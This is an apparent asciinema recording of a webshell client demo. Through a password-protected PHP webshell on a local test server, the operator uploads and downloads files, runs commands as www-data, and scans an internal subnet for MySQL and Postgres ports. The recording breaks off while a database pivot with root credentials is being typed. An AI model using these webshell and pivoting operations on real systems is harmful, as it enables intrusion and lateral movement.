[20.1245, "o", "\u001b[95m[+] [upload] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[20.126, "o", "\u001b[1;32m[+] Uploaded /tmp/notes.txt -> /var/www/html/notes.txt (72 bytes)\u001b[0m\r\n"]
[20.1265, "o", "\u001b[6n"]
[20.1271, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.1281, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.1372, "o", "\u001b[?25l\u001b[?7l\u001b[0mf\u001b[0;38;2;102;102;102mile put /tmp/notes.txt /var/www/html/notes.txt\u001b[46D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.1988, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.2604, "o", "\u001b[?25l\u001b[?7l\u001b[0ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.3219, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mfile\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.3845, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.4472, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mg\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.5089, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.5707, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.6324, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.6942, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.7559, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.8176, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.8793, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.941, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.0027, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.0644, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.1264, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.1881, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.2515, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.3133, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.375, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.4378, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.5007, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.5634, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.6262, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.6888, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.7506, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.8123, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.8743, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.936, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.9978, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mx\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.0596, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.1213, "o", "\u001b[?25l\u001b[?7l\u001b[57D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mfile\u001b[0m \u001b[0;33mget\u001b[0m \u001b[0;33m/var/www/html/notes.txt\u001b[57D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.1213, "o", "\u001b[?2004l"]
[24.1219, "o", "\u001b[95m[+] [download] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[24.1259, "o", "\u001b[1;32m[+] Saved /var/www/html/notes.txt -> \u001b[0m\r\n\u001b[1;32m/home/ubuntu/Documents/dev/WangYihang/Webshell-Sniper/127.0.0.1:8080/var/www/html/notes.txt (72 bytes)\u001b[0m\r\n"]
[24.1268, "o", "\u001b[6n"]
[24.1275, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.1282, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.1363, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.198, "o", "\u001b[?25l\u001b[?7l\u001b[0md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.2598, "o", "\u001b[?25l\u001b[?7l\u001b[27D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > id\u001b[27D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[26.2604, "o", "\u001b[95m[+] [remote] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[26.2641, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\n"]
[26.265, "o", "\u001b[6n"]
[26.2661, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.2674, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.8764, "o", "\u001b[?25l\u001b[?7l\u001b[0ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.938, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.9996, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.0614, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.1229, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mlocal\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.1853, "o", "\u001b[?25l\u001b[?7l\u001b[30D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mlocal\u001b[30D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.1853, "o", "\u001b[?2004l"]
[28.1863, "o", "\u001b[95m[+] Bare commands now run on localhost (the prompt shows LOCAL).\u001b[0m\r\n"]
[28.1871, "o", "\u001b[6n"]
[28.1883, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;41;1m LOCAL \u001b[0m /var/www/html >\u001b[23D\u001b[24C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.1896, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.3974, "o", "\u001b[?25l\u001b[?7l\u001b[0mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.4589, "o", "\u001b[?25l\u001b[?7l\u001b[0mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.5206, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.5822, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.6437, "o", "\u001b[?25l\u001b[?7l\u001b[0mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.7052, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.7668, "o", "\u001b[?25l\u001b[?7l\u001b[30D\u001b[0m\u001b[J\u001b[0;37;41;1m LOCAL \u001b[0m /var/www/html > whoami\u001b[30D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.7668, "o", "\u001b[?2004l"]
[29.7674, "o", "\u001b[95m[+] [local] whoami\u001b[0m\r\n"]
[29.7687, "o", "ubuntu\r\n"]
[29.7694, "o", "\u001b[6n"]
[29.7701, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;41;1m LOCAL \u001b[0m /var/www/html >\u001b[23D\u001b[24C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.7708, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.2785, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[0;38;2;102;102;102mecon privesc\u001b[12D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.3402, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.4018, "o", "\u001b[?25l\u001b[?7l\u001b[0mm\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.4635, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.5251, "o", "\u001b[?25l\u001b[?7l\u001b[0mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.5868, "o", "\u001b[?25l\u001b[?7l\u001b[5D\u001b[0;32mremote\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.6486, "o", "\u001b[?25l\u001b[?7l\u001b[30D\u001b[0m\u001b[J\u001b[0;37;41;1m LOCAL \u001b[0m /var/www/html > \u001b[0;32mremote\u001b[30D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[31.6492, "o", "\u001b[95m[+] Bare commands now run on the target (the prompt shows REMOTE).\u001b[0m\r\n"]
[31.6498, "o", "\u001b[6n"]
[31.6504, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.6511, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[32.8571, "o", "\u001b[?25l\u001b[?7l\u001b[0mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[32.9187, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[32.9803, "o", "\u001b[?25l\u001b[?7l\u001b[0mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.042, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.1037, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mpivot\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.1654, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.2271, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.2888, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.3504, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.412, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.4737, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.5355, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.5985, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.6601, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.7218, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.7835, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.8454, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.9071, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[33.9687, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.0308, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.093, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m7\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.1549, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m2\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.217, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.2791, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.3411, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m6\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.4028, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.4649, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.5267, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.5898, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m0\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.6525, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.7148, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m2\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.7767, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m9\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.8386, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.9005, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.9623, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.0242, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.0861, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.1482, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.21, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.2717, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.3335, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.3954, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m3\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.4572, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m3\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.519, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m0\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.5808, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m6\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.6428, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m,\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.7051, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m5\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.7671, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m4\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.8288, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m3\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.8907, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m2\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.9526, "o", "\u001b[?25l\u001b[?7l\u001b[75D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mpivot\u001b[0m \u001b[0;33mscan\u001b[0m \u001b[0;31m--hosts\u001b[0m \u001b[0;33m172.16.1.0/29\u001b[0m \u001b[0;31m--ports\u001b[0m \u001b[0;33m3306,5432\u001b[75D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[35.9541, "o", "\u001b[95m[+] [portscan] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[35.9542, "o", "\u001b[95m[+] Scanning 172.16.1.0/29 for [3306,5432] ...\u001b[0m\r\n"]
[38.9609, "o", "\u001b[1;32m[+] Open ports:\u001b[0m\r\n\u001b[1;32m172.16.1.2:3306 open\u001b[0m\r\n\u001b[1;32m172.16.1.3:5432 open\u001b[0m\r\n"]
[38.9615, "o", "\u001b[6n"]
[38.9622, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.963, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.3721, "o", "\u001b[?25l\u001b[?7l\u001b[0mp\u001b[0;38;2;102;102;102mivot scan --hosts 172.16.1.0/29 --ports 3306,5432\u001b[49D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.4341, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.4961, "o", "\u001b[?25l\u001b[?7l\u001b[0mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.5586, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.6214, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mpivot\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.6836, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.7454, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.8074, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.8691, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.9308, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.9928, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.0547, "o", "\u001b[?25l\u001b[?7l\u001b[0;31me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.1165, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.1782, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mg\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.2402, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.3022, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.3642, "o", "\u001b[?25l\u001b[?7l\u001b[0;31me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.4265, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.4889, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.5511, "o", "\u001b[?25l\u001b[?7l\u001b[0;33my\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.6132, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.676, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mq\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.7378, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.7998, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.8619, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.9237, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.9856, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.0475, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.1093, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.1712, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.2331, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.295, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.3568, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.4187, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.4807, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.5429, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.605, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mu\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.6669, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.7292, "o", "\u001b[?25l\u001b[?7l\u001b[0;31me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.7911, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.853, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.9148, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.9767, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.0388, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.1012, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.1633, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.2253, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.2877, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.3496, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.4118, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.474, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.5361, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.5987, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.6607, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.7228, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.7852, "o", "\u001b[?25l\u001b[?7l\u001b[0;31md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.8471, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.9094, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.9716, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[44.0338, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[44.0961, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
